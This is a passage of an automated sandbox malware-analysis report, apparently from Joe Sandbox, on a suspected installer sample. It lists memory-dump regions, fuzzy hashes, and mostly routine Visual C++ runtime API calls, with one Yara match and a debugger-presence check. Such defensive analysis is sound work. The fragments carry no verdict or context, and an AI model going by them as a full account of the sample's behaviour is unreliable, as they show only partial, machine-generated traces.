              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
              • String ID:
              • API String ID: 2579439406-0
              • Opcode ID: 6a841d2a5fbc0f775538847d10889583362bd2e22e513505f4e0218f0886a0e3
              • Instruction ID: ee57e67f62a1597839d9fc31c9d32695e8ed9b924051bd698ef386d1d63310af
              • Opcode Fuzzy Hash: 6a841d2a5fbc0f775538847d10889583362bd2e22e513505f4e0218f0886a0e3
              • Instruction Fuzzy Hash: 5E21CCB98013049FC790DFE9FD84AA43BF5FB08B50F10546AF8098BA60E7B059838F55
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_0000C74B), ref: 00A1C792
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: ab6ee427a9977ee1ff179c02c03fb64edeb54ea694abbcf0ee4133dc1fbf2272
              • Instruction ID: 7a8cfadeb7345018a08121f46e8008357b5b34928429cbdb8f96e696a933995c
              • Opcode Fuzzy Hash: ab6ee427a9977ee1ff179c02c03fb64edeb54ea694abbcf0ee4133dc1fbf2272
              • Instruction Fuzzy Hash: 7A9002B029550456871157B85D1A96635926A68A12B4208606105C4498DBD045425952
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID: \VGm
              • API String ID: 0-1150679331
              • Opcode ID: 8cd77398b21f895c594110d1a5e776fd8df2858d60159765598558fa9b16d6cb
              • Instruction ID: 1af2cdbfe7b9e196973b8aba23ea24aa3002c51e3a0f85d1d23359d182cdd1a0
              • Opcode Fuzzy Hash: 8cd77398b21f895c594110d1a5e776fd8df2858d60159765598558fa9b16d6cb
              • Instruction Fuzzy Hash: 3B917EB1E00309DFDF14DFA9C88979DBBF2BF88354F148129D419A7254EBB99841CB86
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
              • Instruction ID: 9acfdfdc2ed837867c356d6af57125e59180f057c3d10ef7d7bbffa0ad348c9e
              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
              • Instruction Fuzzy Hash: EFC18D73D0F5F2498B36422E2418A3BEE626E91B8531FC3B1DCD43F59AC227AD0196D0
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
              • Instruction ID: ddb928264ccf9dbd87eb6d4ccd277be4ad07c2f025d0a21584d9b74cbc8522d1
              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
              • Instruction Fuzzy Hash: 23C17C73D0E5F2499B36472D2418A3BEEA26E91B8531BC3B1DCD43F59BC227AD0196D0
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
              • Instruction ID: 779758ea0ba55226f499f6e2f9e8e13d43849d626d665937d94a7cb64c7a48d6
              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
              • Instruction Fuzzy Hash: 65C19F73D0E9F2498B36472D2418A3FEE626E81B8531BC3B1DCD43F59AC227AD0195D0
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
              • Instruction ID: c8c9495986548b044111ea9c09747cd6ac1c296ca6982b47b3189fdaad8ef6c0
              • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
              • Instruction Fuzzy Hash: 14B18F33D0E5F24A8775822D2458A3FEE626E91B8531AC3B1CCD43F59AC627AD0196D0
              Memory Dump Source
              • Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eb582e00159cc6ff6bdebf46900c32333695db5e2bd2f7d1cac9693d192626a4
              • Instruction ID: 4667edd7e8f798eb732690f4310711740c4171525337a786572cf6b05f87ec62
              • Opcode Fuzzy Hash: eb582e00159cc6ff6bdebf46900c32333695db5e2bd2f7d1cac9693d192626a4
              • Instruction Fuzzy Hash: 5381B175F01618CBDB18EF75945877E77BBBFC8600B05846DD407E7288CE3998029B92
              Memory Dump Source
              • Source File: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3ad0000_998_popxinv_Installer.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
              • Instruction ID: 458cd6654a66325b6483962818556fbac374e800a224833377cac196b5c4551b
              • Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
              • Instruction Fuzzy Hash: 70F03932200215AFCF15DF49C841DAA77E9EF08220B48406AFD09DB221E231ED209B80
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
              • Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
              • Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
              • Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644
              APIs
              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00A15A5E), ref: 00A198ED
              • __mtterm.LIBCMT ref: 00A198F9
                • Part of subcall function 00A19632: DecodePointer.KERNEL32(00000002,00A19A5B,?,00A15A5E), ref: 00A19643
                • Part of subcall function 00A19632: TlsFree.KERNEL32(00000002,00A19A5B,?,00A15A5E), ref: 00A1965D
                • Part of subcall function 00A19632: DeleteCriticalSection.KERNEL32(00000000,00000000,77455810,?,00A19A5B,?,00A15A5E), ref: 00A1B6A4
                • Part of subcall function 00A19632: _free.LIBCMT ref: 00A1B6A7
                • Part of subcall function 00A19632: DeleteCriticalSection.KERNEL32(00000002,77455810,?,00A19A5B,?,00A15A5E), ref: 00A1B6CE
              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A1990F
              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A1991C
              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A19929
              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A19936
              • TlsAlloc.KERNEL32(?,00A15A5E), ref: 00A19986
              • TlsSetValue.KERNEL32(00000000,?,00A15A5E), ref: 00A199A1
              • __init_pointers.LIBCMT ref: 00A199AB
              • EncodePointer.KERNEL32(?,00A15A5E), ref: 00A199BC
              • EncodePointer.KERNEL32(?,00A15A5E), ref: 00A199C9
              • EncodePointer.KERNEL32(?,00A15A5E), ref: 00A199D6
              • EncodePointer.KERNEL32(?,00A15A5E), ref: 00A199E3
              • DecodePointer.KERNEL32(00A197B6,?,00A15A5E), ref: 00A19A04
              • __calloc_crt.LIBCMT ref: 00A19A19
              • DecodePointer.KERNEL32(00000000,?,00A15A5E), ref: 00A19A33
              • GetCurrentThreadId.KERNEL32 ref: 00A19A45
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
              • API String ID: 3698121176-3819984048
              • Opcode ID: 597e25948055fc4c3d1b63df467c74339094b9dc025fbd8e44a4e68d34a3413f
              • Instruction ID: 1cbc49398ea1459ad5f417d35b0822a34b9379309bc7095bf9468e57806d1dc9
              • Opcode Fuzzy Hash: 597e25948055fc4c3d1b63df467c74339094b9dc025fbd8e44a4e68d34a3413f
              • Instruction Fuzzy Hash: 3B315D719053549FF730DFF9AD2AFAB3AA4AB447A0B05052AF518961B1DB348883CF50
              APIs
              • __EH_prolog.LIBCMT ref: 00A12361
              • std::_Lockit::_Lockit.LIBCPMT ref: 00A12370
              • int.LIBCPMT ref: 00A12387
                • Part of subcall function 00A11035: std::_Lockit::_Lockit.LIBCPMT ref: 00A11046
              • std::bad_exception::bad_exception.LIBCMT ref: 00A123BE
              • __CxxThrowException@8.LIBCMT ref: 00A123CC
              • std::locale::facet::_Incref.LIBCPMT ref: 00A123DC
              • std::locale::facet::_Facet_Register.LIBCPMT ref: 00A123E2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
              • String ID: bad cast
              • API String ID: 878426289-3145022300
              • Opcode ID: 60c77eeea5938d2d41e97f16a695899746afb2a9f77091372d6fe589487d22bb
              • Instruction ID: ce8472a4432035067a1bd62e92572feee345081259d2835b40e77a8b5502dd87
              • Opcode Fuzzy Hash: 60c77eeea5938d2d41e97f16a695899746afb2a9f77091372d6fe589487d22bb
              • Instruction Fuzzy Hash: 73118E36D00214ABCF05EBA4DE52AEEB775AF84720F140629F521AB2D1DB74DA85CB90
              APIs
              • __EH_prolog.LIBCMT ref: 00A11E30
              • std::_Lockit::_Lockit.LIBCPMT ref: 00A11E3F
              • int.LIBCPMT ref: 00A11E56
                • Part of subcall function 00A11035: std::_Lockit::_Lockit.LIBCPMT ref: 00A11046
              • std::bad_exception::bad_exception.LIBCMT ref: 00A11E8D
              • __CxxThrowException@8.LIBCMT ref: 00A11E9B
              • std::locale::facet::_Incref.LIBCPMT ref: 00A11EAB
              • std::locale::facet::_Facet_Register.LIBCPMT ref: 00A11EB1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
              • String ID: bad cast
              • API String ID: 878426289-3145022300
              • Opcode ID: 8d967345278663712811595f0ba9f6dbcfa7af4dcbb248775aec60350f41220d
              • Instruction ID: 14a9f62efde6e1b9c08ecf8d7ad3f88d9b0060cf4641401ae64bfa74d3bb7d9e
              • Opcode Fuzzy Hash: 8d967345278663712811595f0ba9f6dbcfa7af4dcbb248775aec60350f41220d
              • Instruction Fuzzy Hash: FC11E536D00214ABCF05EBE4DE02AFEB735AF84720F140229F521671D1DF309A85C790
              APIs
              • __getptd_noexit.LIBCMT ref: 00A1741A
                • Part of subcall function 00A19723: GetLastError.KERNEL32(?,?,00A1A964,00A14478,?,?,00A13C78,?,?,00A1101C), ref: 00A19727
                • Part of subcall function 00A19723: ___set_flsgetvalue.LIBCMT ref: 00A19735
                • Part of subcall function 00A19723: __calloc_crt.LIBCMT ref: 00A19749
                • Part of subcall function 00A19723: DecodePointer.KERNEL32(00000000,?,?,00A1A964,00A14478,?,?,00A13C78,?,?,00A1101C), ref: 00A19763
                • Part of subcall function 00A19723: GetCurrentThreadId.KERNEL32 ref: 00A19779
                • Part of subcall function 00A19723: SetLastError.KERNEL32(00000000,?,?,00A1A964,00A14478,?,?,00A13C78,?,?,00A1101C), ref: 00A19791
              • __calloc_crt.LIBCMT ref: 00A1743C
              • __get_sys_err_msg.LIBCMT ref: 00A1745A
              • _strcpy_s.LIBCMT ref: 00A17462
              • __invoke_watson.LIBCMT ref: 00A17477
              Strings
              • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00A17427, 00A1744A
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
              • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
              • API String ID: 3117964792-798102604
              • Opcode ID: 97ee94752312d832a7bbbd64144bcb5c1ea8ac06a34bd21beed010cbbde00d1c
              • Instruction ID: b76a4ec6cd75f7d1907dd196822de8286bc1ad6254e2d235877d0fef02844ce9
              • Opcode Fuzzy Hash: 97ee94752312d832a7bbbd64144bcb5c1ea8ac06a34bd21beed010cbbde00d1c
              • Instruction Fuzzy Hash: 1DF09E7760C23027D7303A2E6E85DEF7ABCCB44B24F146479FB59DB502E9219CC08295
              APIs
              • __EH_prolog.LIBCMT ref: 00A11A83
              • std::_Lockit::_Lockit.LIBCPMT ref: 00A11A95
              • std::exception::exception.LIBCMT ref: 00A11ACC
                • Part of subcall function 00A13C83: std::exception::_Copy_str.LIBCMT ref: 00A13C9E
              • __CxxThrowException@8.LIBCMT ref: 00A11AE1
                • Part of subcall function 00A1450C: RaiseException.KERNEL32(?,?,00A113AC,?,?,?,?,?,00A113AC,?,00A2CCE8,00000000), ref: 00A1454E
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A11AEA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
              • String ID: bad locale name
              • API String ID: 446407826-1405518554
              • Opcode ID: 5b6da25cc887e0fa0eaca23f428eca3424725662bf8de2b904e81835d219def9
              • Instruction ID: fe7363057479bef1740f996dc267aa83572f336b99a3c0656899c3325c860c14
              • Opcode Fuzzy Hash: 5b6da25cc887e0fa0eaca23f428eca3424725662bf8de2b904e81835d219def9
              • Instruction Fuzzy Hash: 040157B6801B54EECB21EFAED5804CEFFB4BB18700B40866FE55A93601C7749748CBA5
              APIs
              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00A2D638,00000008,00A19777,00000000,00000000,?,?,00A1A964,00A14478,?,?,00A13C78,?,?,00A1101C), ref: 00A19680
              • __lock.LIBCMT ref: 00A196B4
                • Part of subcall function 00A1B7B7: __mtinitlocknum.LIBCMT ref: 00A1B7CD
                • Part of subcall function 00A1B7B7: __amsg_exit.LIBCMT ref: 00A1B7D9
                • Part of subcall function 00A1B7B7: EnterCriticalSection.KERNEL32(00000000,00000000,?,00A196B9,0000000D), ref: 00A1B7E1
              • InterlockedIncrement.KERNEL32(?), ref: 00A196C1
              • __lock.LIBCMT ref: 00A196D5
              • ___addlocaleref.LIBCMT ref: 00A196F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
              • String ID: KERNEL32.DLL
              • API String ID: 637971194-2576044830
              • Opcode ID: f938b68dbd9629610bbbeace89faef854440390113c616cb3eeb4e0634c3c529
              • Instruction ID: 2d5fa8745444043bf612c7399b1066d7e2c2e9265e43edd10599f9609fcbf292
              • Opcode Fuzzy Hash: f938b68dbd9629610bbbeace89faef854440390113c616cb3eeb4e0634c3c529
              • Instruction Fuzzy Hash: D1016171405B00DFD720DF79DA4578AFBF0AF50324F10891DE49A562E1CBB4A585CF15
              APIs
              • __getptd.LIBCMT ref: 00A176F1
                • Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
                • Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC
              • __getptd.LIBCMT ref: 00A17702
              • __getptd.LIBCMT ref: 00A17710
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: __getptd$__amsg_exit__getptd_noexit
              • String ID: MOC$RCC$csm
              • API String ID: 803148776-2671469338
              • Opcode ID: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
              • Instruction ID: 44c92e3e976480047ac5731802fbe87f4ff5dcf2db303d13a6702fa3d1c71738
              • Opcode Fuzzy Hash: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
              • Instruction Fuzzy Hash: 67E01A355181048FCF20AB68C14ABFD33A5EF48325F5E64A1E40DCB2A2D738E8D0CA82
              APIs
              • __CreateFrameInfo.LIBCMT ref: 00A179BB
                • Part of subcall function 00A14842: __getptd.LIBCMT ref: 00A14850
                • Part of subcall function 00A14842: __getptd.LIBCMT ref: 00A1485E
              • __getptd.LIBCMT ref: 00A179C5
                • Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
                • Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC
              • __getptd.LIBCMT ref: 00A179D3
              • __getptd.LIBCMT ref: 00A179E1
              • __getptd.LIBCMT ref: 00A179EC
              • _CallCatchBlock2.LIBCMT ref: 00A17A12
                • Part of subcall function 00A148E7: __CallSettingFrame@12.LIBCMT ref: 00A14933
                • Part of subcall function 00A17AB9: __getptd.LIBCMT ref: 00A17AC8
                • Part of subcall function 00A17AB9: __getptd.LIBCMT ref: 00A17AD6
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
              • String ID:
              • API String ID: 1602911419-0
              • Opcode ID: 10d16ccdc4cff964419c923ae3608f8cb9d96c94bbfad410bfaee844ac034467
              • Instruction ID: 1ad538480fe432896ac967532fac897af0057f9731399065e2271c8d0210bb6e
              • Opcode Fuzzy Hash: 10d16ccdc4cff964419c923ae3608f8cb9d96c94bbfad410bfaee844ac034467
              • Instruction Fuzzy Hash: 371119B5C00209DFDF00EFA4C645AEE7BB1FF08320F148469F814A7292DB389A919F54
              APIs
              • __getptd.LIBCMT ref: 00A1D230
                • Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
                • Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC
              • __amsg_exit.LIBCMT ref: 00A1D250
              • __lock.LIBCMT ref: 00A1D260
              • InterlockedDecrement.KERNEL32(?), ref: 00A1D27D
              • _free.LIBCMT ref: 00A1D290
              • InterlockedIncrement.KERNEL32(01331670), ref: 00A1D2A8
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
              • String ID:
              • API String ID: 3470314060-0
              • Opcode ID: fad2c5b1533f821b7ab997722a1139969a55bf11430495c28b67b210bb459c65
              • Instruction ID: 13465f600cbd098741a143afac1f38d7b7baa0792e91c3b5856a50a9f0fb9267
              • Opcode Fuzzy Hash: fad2c5b1533f821b7ab997722a1139969a55bf11430495c28b67b210bb459c65
              • Instruction Fuzzy Hash: 64018032D016219BCB31AFA89A05BED77B0BF44B61F094035E824A7691C77499C3CBD5
              APIs
              • __EH_prolog.LIBCMT ref: 00A11B08
              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00A11B1C
                • Part of subcall function 00A132F2: _setlocale.LIBCMT ref: 00A13304
